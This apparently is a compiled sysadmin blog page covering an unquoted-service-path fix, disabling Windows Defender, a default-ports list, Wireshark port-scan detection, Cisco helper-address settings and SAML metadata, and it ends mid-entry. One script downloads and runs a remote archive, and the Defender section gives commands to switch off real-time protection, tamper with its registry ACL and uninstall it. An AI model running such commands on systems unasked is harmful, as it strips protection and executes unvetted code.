Install Time : 2/2/2018 6:13 PM

Package Identity : Microsoft-Windows-ServerCore-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-ServerCore-Server-Common-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Microsoft-Windows-ServerCore-SKU-Foundation-Package~31bf3856ad364e35~amd64~~10.0.14393.0
State : Installed
Release Type : Feature Pack
Install Time : 7/16/2016 1:25 PM

Package Identity : Package_for_KB4049065~31bf3856ad364e35~amd64~~10.0.1.3
State : Installed
Release Type : Update
Install Time : 2/2/2018 7:21 PM

Package Identity : Package_for_KB4054590~31bf3856ad364e35~amd64~~10.0.1.2072
State : Installed
Release Type : Update
Install Time : 2/23/2019 4:11 AM

Package Identity : Package_for_KB4091664~31bf3856ad364e35~amd64~~10.0.6.0
State : Installed
Release Type : Update
Install Time : 2/5/2019 6:39 PM

Package Identity : Package_for_KB4132216~31bf3856ad364e35~amd64~~10.0.1.0
State : Installed
Release Type : Update
Install Time : 2/4/2019 11:46 PM

Package Identity : Package_for_KB4346087~31bf3856ad364e35~amd64~~10.0.3.0
State : Install Pending
Release Type : Update
Install Time :

Package Identity : Package_for_KB4465659~31bf3856ad364e35~amd64~~10.0.1.2
State : Installed
Release Type : Security Update
Install Time : 2/5/2019 1:26 AM

Package Identity : Package_for_KB4485447~31bf3856ad364e35~amd64~~10.0.1.1
State : Installed
Release Type : Security Update
Install Time : 2/23/2019 4:11 AM

Package Identity : Package_for_RollupFix~31bf3856ad364e35~amd64~~14393.1884.1.3
State : Superseded
Release Type : Security Update
Install Time : 2/2/2018 7:21 PM

Package Identity : Package_for_RollupFix~31bf3856ad364e35~amd64~~14393.2941.1.10
State : Installed
Release Type : Update
Install Time : 5/1/2019 7:05 PM

The operation completed successfully.

Once the package is in the Install Pending state, a reboot is the last step; Windows only reports the update as installed (and the scanner only sees the new microcode DLL version) after the restart.

PowerShell: Remediate Microsoft Windows Unquoted Service Path Enumeration

Description
The remote Windows host has at least one service installed that uses an unquoted service path, which contains at least one whitespace. A local attacker can gain elevated privileges by inserting an executable file in the path of the affected service.

Note that this is a generic test that will flag any application affected by the described vulnerability.
 
(Source: Tenable.IO)
 
Solution
Ensure that any services that contain a space in the path enclose the path in quotes.

There is more than one way to skin this rabbit. The manual method (find each service with a space in its ImagePath and quote it) is time consuming, and a security company, Vector BCO, has already published the machinery to do it in one pass. So, to the point: here is a PowerShell script that automates the fix on Windows hosts residing in proxy-controlled environments.

# Proxy values for hosts that reach the Internet only through a proxy
$proxy = "http://proxy:8080"
$exclusionList = "localhost;*.kimconnect.com"
$GLOBAL:haveInternet = $false

function checkProxy{
    try{
        # -UseBasicParsing avoids the Internet Explorer engine on Server Core and first-run profiles
        $connectionTest = Invoke-WebRequest -Uri "https://download.microsoft.com" -UseBasicParsing -ErrorAction Stop
        return [bool]$connectionTest
    }
    catch{
        return $false
    }
}

function fixProxy{
    # If the user profile has a proxy enabled, mirror it for browsers, WinHTTP and .NET
    $proxyKey = Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
    if ($proxyKey.ProxyEnable){
        # Set http proxy for browsers
        Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" -Name 'ProxyServer' -Value $proxy

        # Set winhttp proxy for PowerShell
        netsh winhttp set proxy $proxy $exclusionList
        [System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy($proxy)
        [System.Net.WebRequest]::DefaultWebProxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
        [System.Net.WebRequest]::DefaultWebProxy.BypassProxyOnLocal = $true
        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    }

    if (checkProxy){
        "Proxy is now good to go..."
        $GLOBAL:haveInternet = $true
    }
    else{
        "Proxy problems..."
        $GLOBAL:haveInternet = $false
    }
}

function fixUnquotedServicePathEnum{
    if (-not $GLOBAL:haveInternet){ fixProxy }
    if (-not $GLOBAL:haveInternet){ throw "No Internet access; download the fix script manually." }

    $fixScriptDownload = "https://kimconnect.com/wp-content/uploads/2019/05/Windows_Path_Enumerate.zip"
    $fixScriptDestination = "C:\Temp\Windows_Path_Enumerate.zip"
    $destination = "C:\Temp"
    New-Item -ItemType Directory -Path $destination -Force | Out-Null
    (New-Object System.Net.WebClient).DownloadFile($fixScriptDownload, $fixScriptDestination)
    Expand-Archive -Path $fixScriptDestination -DestinationPath $destination -Force
    # Review the extracted script before running it: it rewrites service and uninstall-string registry values
    & "$destination\Windows_Path_Enumerate.ps1" -FixUninstall -FixEnv

<# This doesn't work if the proxy blocks .ps1 downloads, or when Microsoft requires a manual click-through of the agreement
$fixScriptDestination="C:\Temp\Windows_Path_Enumerate.ps1"
$fixScriptDownload="https://gallery.technet.microsoft.com/scriptcenter/Windows-Unquoted-Service-190f0341/file/136821/7/Windows_Path_Enumerate.ps1"
(New-Object System.Net.WebClient).DownloadFile($fixScriptDownload, $fixScriptDestination)
C:\Temp\Windows_Path_Enumerate.ps1 -FixUninstall -FixEnv
#>
}

fixUnquotedServicePathEnum
Expected Output
C:\Users\kimconnect\Desktop\unit-test.ps1
2019-05-10 18:05:10Z : INFO : Executed x64 Powershell on x64 OS
2019-05-10 18:05:10Z : INFO : Computername: KOMPUTER
2019-05-10 18:05:10Z : Old Value : Service : 'ams' - C:\Program Files\OEM\AMS\service\ams.exe
2019-05-10 18:05:10Z : Expected : Service : 'ams' - "C:\Program Files\OEM\AMS\service\ams.exe"
2019-05-10 18:05:10Z : SUCCESS : Path value was changed for Service 'ams'
2019-05-10 18:05:11Z : Old Value : Service : 'sma' - C:\Program Files\OEM\AMS\service\sma.exe
2019-05-10 18:05:11Z : Expected : Service : 'sma' - "C:\Program Files\OEM\AMS\service\sma.exe"
2019-05-10 18:05:11Z : SUCCESS : Path value was changed for Service 'sma'
2019-05-10 18:05:11Z : Old Value : Software : '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}' - C:\Program Files\Altiris\Altiris Agent\aexnsagent
.exe /uninstall
2019-05-10 18:05:11Z : Expected : Software : '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}' - "C:\Program Files\Altiris\Altiris Agent\aexnsagen
t.exe" /uninstall
2019-05-10 18:05:11Z : SUCCESS : Path value was changed for Software '{92F2A534-C3E4-4B18-BEBD-329F5E848C8B}'
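For hosts that cannot download anything, here is a self-contained detector and fixer for the service half of the finding (the uninstall-string half, which the output above also shows, lives under the Uninstall keys and follows the same pattern). This is an added example, not the Vector BCO script or code from the original post. It reads ImagePath from the registry rather than from Get-Service because that raw, unexpanded value is what the Service Control Manager parses, and the only condition it treats as vulnerable is a space inside the unquoted executable path, which is exactly what lets an attacker plant C:\Program.exe or C:\Program Files\OEM\AMS.exe. The sample inputs are constructed.

```powershell
# Added example: find and quote unquoted service paths without an external script.
function Repair-UnquotedImagePath {
    param([string]$ImagePath)
    # Already quoted, or empty: leave unchanged
    if ([string]::IsNullOrWhiteSpace($ImagePath) -or $ImagePath.TrimStart().StartsWith('"')) { return $ImagePath }
    # The executable is everything up to and including the first ".exe"; the remainder is arguments.
    # Drivers (.sys) and other non-.exe entries are not subject to the issue and are left alone.
    if ($ImagePath -notmatch '^(?<exe>.*?\.exe)(?<rest>.*)$') { return $ImagePath }
    $exe = $Matches.exe; $rest = $Matches.rest
    # A space in the executable path itself is the vulnerable condition
    if ($exe -notmatch '\s') { return $ImagePath }
    return "`"$exe`"$rest"
}

function Find-UnquotedServicePath {
    param([switch]$Fix)
    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue | ForEach-Object {
        $key = Get-Item -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $key) { return }
        # Read the raw value: Get-ItemProperty would expand %SystemRoot% and we must write back what was there
        $old = $key.GetValue('ImagePath', $null, [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
        if (-not $old) { return }
        $new = Repair-UnquotedImagePath -ImagePath $old
        if ($new -ne $old) {
            if ($Fix) {
                # Preserve the value kind (REG_SZ vs REG_EXPAND_SZ) when rewriting
                Set-ItemProperty -Path $_.PSPath -Name 'ImagePath' -Value $new -Type $key.GetValueKind('ImagePath')
            }
            [pscustomobject]@{ Service = $_.PSChildName; Old = $old; New = $new; Fixed = [bool]$Fix }
        }
    }
}

# Constructed inputs mirroring the scanner output above, plus cases that must NOT be touched
'C:\Program Files\OEM\AMS\service\ams.exe',
'C:\Program Files\OEM\AMS\service\sma.exe -service',
'"C:\Program Files\Already Quoted\svc.exe" /arg',
'C:\Windows\system32\svchost.exe -k netsvcs',
'\SystemRoot\System32\drivers\ACPI.sys' |
    ForEach-Object { [pscustomobject]@{ Before = $_; After = Repair-UnquotedImagePath -ImagePath $_ } }

Find-UnquotedServicePath          # report only
# Find-UnquotedServicePath -Fix   # rewrite ImagePath in the registry, then re-run the scan
```

Only the first two constructed inputs come back changed. Run the report form first and read it: a vendor service whose arguments themselves contain an unquoted path is rare but does exist, and the fix only quotes the executable.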
Additional Information from Tenable.IO
Risk Information

Risk Factor: Medium
CVSS v3.0 Base Score: 7.8
CVSS v3.0 Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.0 Temporal Vector: E:P/RL:O/RC:C
CVSS v3.0 Temporal Score: 7.0
CVSS Base Score: 6.9
CVSS Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C
CVSS Temporal Score: 5.4
CVSS Temporal Vector: E:POC/RL:OF/RC:C

Vulnerability Information

Exploit Available: true
Exploit Ease: Exploits are available
Vulnerability Pub Date: 09/15/12 at 12:00 AM
Exploitable With
Metasploit (Windows Service Trusted Path Privilege Escalation)

Reference Information

CVE: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1609, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0759, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5455
ICSA: 14-058-01

PowerShell: Disable Windows Defender

Windows Defender can run alongside enterprise antivirus products such as McAfee or Symantec, but two resident engines cost performance and produce duplicate alerts, so it is normally disabled on systems that already run one of those products. Here are two automated methods to get this done.

1. PowerShell on Localhost

On Windows Server 2012 R2, these commands would have worked:

# Disable Defender's real-time scanning engine
Set-MpPreference -DisableRealtimeMonitoring $True

# Deactivate the engine through the policy key. Note the HKLM: drive: the registry provider does not
# resolve a path spelled "HKEY_LOCAL_MACHINE\...", which is what the first version of this line used.
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -Force

On Windows 10 and Windows Server 2016 with the updated antimalware platform (KB4052623, https://support.microsoft.com/en-us/help/4052623/update-for-windows-defender-antimalware-platform) this was no longer enough: Defender protects its own configuration key, HKLM\SOFTWARE\Microsoft\Windows Defender, so that even local administrators cannot write to it, and the registry-only attempts below all failed. They are kept here for reference.

For those who are interested in security topics, these are the related advisories leading to this change:

  • https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11937
  • https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11940
# My fancy way to check whether the Defender engine is installed and running
try{ Get-MpComputerStatus -ErrorAction Stop | Out-Null; "Windows Defender IS enabled on this system." }
catch{ "Windows Defender is NOT enabled on this system." }

# This is the better method, provided by Michael Shoff. Note the .exe: inside PowerShell a bare "sc" is the alias for Set-Content
sc.exe query windefend

# Disable it within Defender's own configuration key (failed attempt: this is not the policy key, and the service protects it)
Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force
# Error
PS C:\Users\tester> Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Force
Set-ItemProperty : Requested registry access is not allowed.
At line:1 char:1
+ Set-ItemProperty -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Def ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (HKLM\SOFTWARE\Microsoft\Windows Defender:String) [Set-ItemProperty],
SecurityException
+ FullyQualifiedErrorId : System.Security.SecurityException,Microsoft.PowerShell.Commands.SetItemPropertyCommand

# Attempt to grant Administrators full control on that key (failed: writing the DACL is denied the same way)
$acl = Get-Acl "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender"
$fullControl = New-Object System.Security.AccessControl.RegistryAccessRule ("$env:COMPUTERNAME\Administrators","FullControl","Allow")
$acl.SetAccessRule($fullControl)
Set-Acl -Path "Registry::HKLM\SOFTWARE\Microsoft\Windows Defender" -AclObject $acl

If all of this feels like a detour, here is the line that actually addresses the issue on Windows Server, where Defender is an installable feature:

# Uninstall Windows Defender (Remove-WindowsFeature is an alias of this cmdlet); a restart completes the removal
Uninstall-WindowsFeature -Name Windows-Defender-GUI, Windows-Defender
2. Group Policy

Open the Group Policy Management Console (gpmc.msc; ADUC cannot create GPOs), create a new GPO linked to the OU of the affected servers, and set:
Computer Configuration > Administrative Templates > Windows Components > Windows Defender > these values:

Turn off Windows Defender = Enabled
Real-time Protection > Turn off real-time protection = Enabled (optional, since the preceding setting already stops the engine)

Please note that this GP instruction is meant for Windows Server 2016 and 2019; the template path and behaviour differ on Windows Server 2008 and 2012.
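Whichever method is used, the step that matters is the one before it: confirming that a replacement engine is actually running before Defender goes away, so the server is never left without protection. The following is an added example (not from the original post) that records Defender's state, refuses to remove it unless one of the expected third-party services is running, and records the state again afterwards. The third-party service names are assumptions for McAfee (McShield) and Symantec Endpoint Protection (SepMasterService); substitute the service name of the product in use.

```powershell
# Added example: remove Defender on Windows Server only once a replacement AV service is running.
function Get-DefenderState {
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $mp  = try { Get-MpComputerStatus -ErrorAction Stop } catch { $null }
    # Get-WindowsFeature exists on Windows Server only; report n/a elsewhere
    $feature = try { (Get-WindowsFeature -Name Windows-Defender -ErrorAction Stop).InstallState } catch { 'n/a (not a Server SKU)' }
    [pscustomobject]@{
        ServiceState = if ($svc) { $svc.Status.ToString() } else { 'not installed' }
        RealTimeOn   = if ($mp) { [bool]$mp.RealTimeProtectionEnabled } else { $false }
        FeatureState = $feature
    }
}

function Disable-DefenderIfReplaced {
    param(
        # Assumed service names: McAfee VirusScan and Symantec Endpoint Protection
        [string[]]$ReplacementServices = @('McShield', 'SepMasterService')
    )
    $running = Get-Service -Name $ReplacementServices -ErrorAction SilentlyContinue |
               Where-Object Status -eq 'Running'
    if (-not $running) {
        Write-Warning "None of [$($ReplacementServices -join ', ')] is running; leaving Windows Defender in place."
        return Get-DefenderState
    }
    "Replacement engine running: $($running.Name -join ', ')"
    "Before:"; Get-DefenderState
    # Stop real-time scanning immediately, then remove the feature (takes effect fully after a restart)
    Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction SilentlyContinue
    Uninstall-WindowsFeature -Name Windows-Defender-GUI, Windows-Defender | Out-Null
    "After:"; Get-DefenderState
}

Disable-DefenderIfReplaced
```

Keep the before/after output with the change ticket; it is the evidence that the host was never without an engine.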

Default Ports for Various Common Services

Moving a service off its default port adds little real security (a port scan finds the moved service in seconds), so treat this list as a reference rather than a hardening control: default ports are where Network Engineers start when troubleshooting connectivity, and where penetration testers look first when mapping a host before choosing exploit modules.

FTP:
21/TCP (control)
20/TCP (active-mode data)
TFTP:
69/UDP
8099/TCP (user interface to TFTP service traffic)
SMB:
445/TCP
137,138/UDP (NetBIOS name and datagram services)
139/TCP (NetBIOS session service)
Active Directory:
53/UDP,TCP (DNS)
88/UDP,TCP (Kerberos)
389/UDP,TCP (LDAP)
636/TCP (LDAP over TLS)
464/UDP,TCP (Kerberos password change)
3268/TCP (Global Catalog), 3269/TCP (Global Catalog over TLS)
135/TCP plus 49152-65535/TCP (RPC endpoint mapper and dynamic range, used by replication and management tools)
445/TCP (SYSVOL and NETLOGON shares)
RDP:
3389/TCP (3389/UDP is also used by RDP 8.0 and later)
WinCollect:
135/TCP (Microsoft Endpoint Mapper)
137/UDP (NetBIOS name service)
138/UDP (NetBIOS datagram service)
139/TCP (NetBIOS session service)
445/TCP (Microsoft Directory Services for file transfers that use Windows shares)
49152-65535/TCP (default dynamic port range for TCP/IP)
OpenLDAP:
389/TCP
636/TCP (LDAP over TLS)
NTP:
123/UDP
RPC:
135/TCP (endpoint mapper)
49152-65535/TCP (dynamic port range on Vista/2008 and later)
Websense Proxy:
80,443/TCP (incoming requests)
9443,19448/TCP (UI browsing)
22/TCP (Protector)
https://www.websense.com/content/support/library/deployctr/v76/triton_ports.aspx
Squid:
3128/TCP (HTTP proxy default), 3129/TCP (interception mode)
PostgreSQL:
5432/TCP
MySQL:
3306/TCP
Microsoft SQL:
--------------------------
Inbound:
1433/TCP (default instance listener)
1434/UDP (SQL Server Browser service)
4022/TCP (Service Broker, by convention)
5022/TCP (AlwaysOn availability group endpoint, by convention)
135/TCP (Transact-SQL debugger, DTC)
2383/TCP (Analysis Services default instance)
2382/TCP (SQL Server Browser redirector for Analysis Services)
500,4500/UDP (IPsec)
137-138/UDP (NetBIOS / CIFS)
139/TCP (NetBIOS / CIFS)
445/TCP (CIFS)

Outbound:
49152-65535/TCP (dynamic ports used by named instances)
Oracle SQL:
1521/TCP (listener)
1630/TCP (Connection Manager)
3938/TCP (Enterprise Manager agent, HTTP)
MongoDB:
27017,27018,27019/TCP
Veeam:
80/TCP (download updates)
443/TCP (HTTPS license auto-update)
10443/TCP (HTTPS)
902/TCP (data transfer)
22/TCP (control channel)
1433/TCP (Microsoft SQL backup via Veeam)
53/UDP (DNS communication)
9501/TCP (communication between Veeam Broker Service and its components)
9392/TCP (replication)
10003/TCP (Veeam Cloud Connect)
2500/TCP (transmission channels)
6160/TCP (Veeam installer service)
6161/TCP (Veeam vPower NFS service)
6162/TCP (Data Mover service)
plus the RPC and SMB ports listed above
HPE StoreOnce:
111/TCP (portmapper/mountd, used by NFS and DD Boost)
2049 (NFS)
2052 (NFS mountd)
9387,9389/TCP (Catalyst)
Norton / Symantec Endpoint Protection:
139,445/TCP
137,138/UDP
22/TCP
2967,2968/TCP
2638/TCP
1433/TCP
8443,8444/TCP
9090/TCP
8014/TCP
443/TCP (HTTPS)
8081/TCP (HTTP)
8082/TCP (HTTPS)
8445,8446,8447/TCP
8765/TCP
1100/TCP
514/UDP
WhatsUp Gold:
ICMP
20/TCP (inbound FTP)
21-23/TCP (outbound FTP)
25/TCP (outbound mail)
53/UDP (outbound DNS)
80/TCP (outbound monitoring)
80,443/TCP (inbound web server)
https://community.ipswitch.com/s/article/Network-ports-used-by-Ipswitch-Network-Management-products-1307717736810
SNMP:
161/UDP (queries), 162/UDP (traps); TCP variants are defined but rarely used
Altiris:
5663/TCP
50124/TCP
KMS:
1688/TCP
SSH:
22/TCP
HTTP / HTTPS:
80/TCP (HTTP)
443/TCP (HTTPS)
SMTP:
25/TCP (server-to-server relay, opportunistic STARTTLS)
587/TCP (authenticated submission, STARTTLS)
465/TCP (authenticated submission over implicit TLS)
POP3:
110/TCP (unencrypted, optional STARTTLS)
995/TCP (implicit TLS)

Wireshark Overview

SysAdmins, InfoSec, and Network Engineers use this tool to troubleshoot and inspect network activity on the fly. Here is an overview of its usage:

1. Configure wireshark to listen to an interface
2. To collect data, click Start
3. Data columns

  1. Source
  2. Destination
  3. Protocol
  4. Length
  5. Info

4. Filtering raw data to produce information

  1. Filter > type in a protocol name (e.g. ftp) > select a packet > expand the protocol section in the details pane
  2. To narrow the filter to one host and protocol, enter ftp && ip.addr == <IP_ADDRESS> (display filters use the field names, not bare addresses). The same filter can be built by right-clicking an interesting packet > Apply as Filter

5. How to detect a network scan

  1. A port scan shows up as one source address sending SYN packets to many different ports (or many hosts) in quick succession, with the target answering [RST, ACK] for each closed port and [SYN, ACK] for each open one; Wireshark colours these rows distinctly, which makes the burst easy to spot. Confirm the verdict by checking whether other hosts on the segment see the same source behaving the same way. Note that "TCP ACKed unseen segment" is a different flag: it means the capture missed packets, not that a scan is under way.
  2. If the local interface is sending unknown traffic to a strange remote IP, use your operating system's tools to trace the offending application or process. Here are sample commands for various OSes:
i. Windows: netstat -aon | findstr ":{port_number}" shows the owning PID in the last column; then tasklist /FI "PID eq {PID}" names the process

ii. Linux: ss -lnp | grep {port_number} (or netstat -lnp | grep {port_number}) shows the listening process and PID

iii. macOS: sudo lsof -i :{port_number} > note the PID of the probable cause > open Activity Monitor > match the PID to the suspect app > quit the process
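The "one source, many ports, RST replies" pattern from item 5.1, as detection logic over an exported packet list. This is an added example, not part of the original post; it expects the CSV layout Wireshark produces with File > Export Packet Dissections > As CSV (the same columns listed under item 3), and the packet rows below are constructed: one ordinary SMB connection from 10.0.0.20 and a six-port sweep from 10.0.0.99.

```powershell
# Added example: flag SYN sweeps in a Wireshark CSV export.
function Find-PortScanners {
    param([string]$PacketCsv, [int]$MinPorts = 5)
    $pkts = $PacketCsv | ConvertFrom-Csv
    # Pull source port, destination port and flags out of the Info column ("51000 > 22 [SYN] ...");
    # newer Wireshark builds print an arrow instead of ">", so accept both
    $parsed = foreach ($p in $pkts) {
        if ($p.Protocol -ne 'TCP') { continue }
        if ($p.Info -match '^(?<sport>\d+)\s+(?:>|->|→)\s+(?<dport>\d+)\s+\[(?<flags>[^\]]+)\]') {
            [pscustomobject]@{
                Src = $p.Source; Dst = $p.Destination
                SPort = [int]$Matches.sport; DPort = [int]$Matches.dport; Flags = $Matches.flags
            }
        }
    }
    # Connection attempts: SYN without ACK (display filter: tcp.flags.syn==1 && tcp.flags.ack==0)
    $syns = $parsed | Where-Object { $_.Flags -eq 'SYN' }
    foreach ($g in ($syns | Group-Object Src)) {
        $targets = @($g.Group | ForEach-Object { "$($_.Dst):$($_.DPort)" } | Sort-Object -Unique)
        if ($targets.Count -lt $MinPorts) { continue }
        # Replies back to the scanner: RST = closed port, SYN,ACK = open port (display filter: tcp.flags.reset==1)
        $replies = $parsed | Where-Object { $_.Dst -eq $g.Name }
        [pscustomobject]@{
            Scanner     = $g.Name
            PortsProbed = $targets.Count
            Closed      = @($replies | Where-Object { $_.Flags -match 'RST' }).Count
            Open        = @($replies | Where-Object { $_.Flags -eq 'SYN, ACK' }).Count
            OpenPorts   = @($replies | Where-Object { $_.Flags -eq 'SYN, ACK' } | ForEach-Object SPort | Sort-Object -Unique)
        }
    }
}

# Constructed export: a normal SMB session from 10.0.0.20, then a sweep of six ports from 10.0.0.99
$export = @'
"No.","Time","Source","Destination","Protocol","Length","Info"
"1","0.000","10.0.0.20","10.0.0.5","TCP","74","49152 > 445 [SYN] Seq=0 Win=64240 Len=0"
"2","0.001","10.0.0.5","10.0.0.20","TCP","74","445 > 49152 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0"
"3","0.002","10.0.0.20","10.0.0.5","TCP","66","49152 > 445 [ACK] Seq=1 Ack=1 Win=64240 Len=0"
"4","1.000","10.0.0.99","10.0.0.5","TCP","74","51000 > 21 [SYN] Seq=0 Win=1024 Len=0"
"5","1.001","10.0.0.5","10.0.0.99","TCP","60","21 > 51000 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0"
"6","1.002","10.0.0.99","10.0.0.5","TCP","74","51001 > 22 [SYN] Seq=0 Win=1024 Len=0"
"7","1.003","10.0.0.5","10.0.0.99","TCP","74","22 > 51001 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0"
"8","1.004","10.0.0.99","10.0.0.5","TCP","74","51002 > 23 [SYN] Seq=0 Win=1024 Len=0"
"9","1.005","10.0.0.5","10.0.0.99","TCP","60","23 > 51002 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0"
"10","1.006","10.0.0.99","10.0.0.5","TCP","74","51003 > 80 [SYN] Seq=0 Win=1024 Len=0"
"11","1.007","10.0.0.5","10.0.0.99","TCP","60","80 > 51003 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0"
"12","1.008","10.0.0.99","10.0.0.5","TCP","74","51004 > 445 [SYN] Seq=0 Win=1024 Len=0"
"13","1.009","10.0.0.5","10.0.0.99","TCP","74","445 > 51004 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0"
"14","1.010","10.0.0.99","10.0.0.5","TCP","74","51005 > 3389 [SYN] Seq=0 Win=1024 Len=0"
"15","1.011","10.0.0.5","10.0.0.99","TCP","60","3389 > 51005 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0"
'@

Find-PortScanners -PacketCsv $export   # one row: 10.0.0.99, 6 ports probed, 4 closed, 2 open (22, 445)
# Real capture: Find-PortScanners -PacketCsv (Get-Content .\capture.csv -Raw) -MinPorts 20
```

The benign host never appears because it touched a single port. Raise -MinPorts on a busy segment, and remember that the learned open-port list is also what the scanner learned, which is a useful starting point for the response.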

IP Helper Address

What is it and how to use it?

When the DHCP Server is placed on a different subnet from the all its clients. It is important that the router at the disparate subnets be configured with an “IP helper-address” specifying the Server as its pass-through broadcast node. Here is a sample command to enable such configuration:

CORE01 (config-if)#ip helper-address 192.168.0.1

Be advised that the "ip helper-address" feature relays a whole suite of UDP ports by default, not just DHCP:

Protocol                                              UDP Port
Timeserver (not the same as the NTP port, UDP 123)    37
TACACS                                                49
DNS                                                   53
BOOTP/DHCP server                                     67
BOOTP/DHCP client                                     68
TFTP                                                  69
NetBIOS name service                                  137
NetBIOS datagram service                              138
IEN-116 name service                                  42

To enhance the network security posture, it may be necessary to stop relaying any unused port with commands such as this (Cisco IOS; note that ip forward-protocol is a global configuration command, not an interface one):

CORE01(config)#no ip forward-protocol udp 49
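Putting both halves together, here is what the finished configuration looks like on a Cisco IOS device that only needs the helper for DHCP. This is an added example, not from the original notes; the VLAN interface, its addressing, and the decision to keep only the BOOTP/DHCP ports are assumptions for a network where the helper serves DHCP alone.

```text
! Added example (not from the original notes): the client VLAN relays DHCP to
! 192.168.0.1 and the router stops relaying the other default UDP ports.
! Interface, VLAN number and addressing are assumptions.
interface Vlan10
 description Client VLAN - DHCP relayed to 192.168.0.1
 ip address 10.10.10.1 255.255.255.0
 ip helper-address 192.168.0.1
!
! ip forward-protocol is global (config mode, not config-if).
! Keep the BOOTP/DHCP ports (67/68) and stop relaying the rest of the default set.
no ip forward-protocol udp 37
no ip forward-protocol udp 42
no ip forward-protocol udp 49
no ip forward-protocol udp 53
no ip forward-protocol udp 69
no ip forward-protocol udp 137
no ip forward-protocol udp 138
!
! verify:  show ip interface Vlan10 | include Helper
!          show running-config | include forward-protocol
```

If the same helper is also relied on for TFTP (PXE boot) or NetBIOS name resolution, leave those ports in place; the point is that every port still relayed should be one you can name a consumer for.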

How to Use QRadar to Search for a Windows Account Activities

Log into https://qradar/console/qradar/jsp/QRadar.jsp

Log Activity > Add Filter > Parameter = Username [Indexed] | Operator = Equals any of | Value = "UserName" > click the '+' sign > click Add Filter

Click on View > Select An Option = Last 24 hours

Wait for progress to complete > view through any resulting item

Sample Multi-Site Metadata

The SimpleSAMLphp module requires that each site be configured with a $metadata entry. Below is a sample of this data.

$metadata['https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp',
),
2 =>
array (
'index' => 2,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
3 =>
array (
'index' => 3,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:artifact-01',
'Location' => 'https://ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml1-acs.php/default-sp/artifact',
),
),
'contacts' =>
array (
0 =>
array (
'emailAddress' => 'admin@kimconnect.com',
'contactType' => 'technical',
'givenName' => 'Ops',
),
),
);

$metadata['https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/metadata.php/default-sp'] = array (
'SingleLogoutService' =>
array (
0 =>
array (
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-logout.php/default-sp',
),
),
'AssertionConsumerService' =>
array (
0 =>
array (
'index' => 0,
'Binding' => 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST',
'Location' => 'https://app01.ui.prod.kimconnect.com:8443/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp',
),
1 =>
array (
'index' => 1,
'Binding' => 'urn:oasis:names:tc:SAML:1.0:profiles:browser-post',
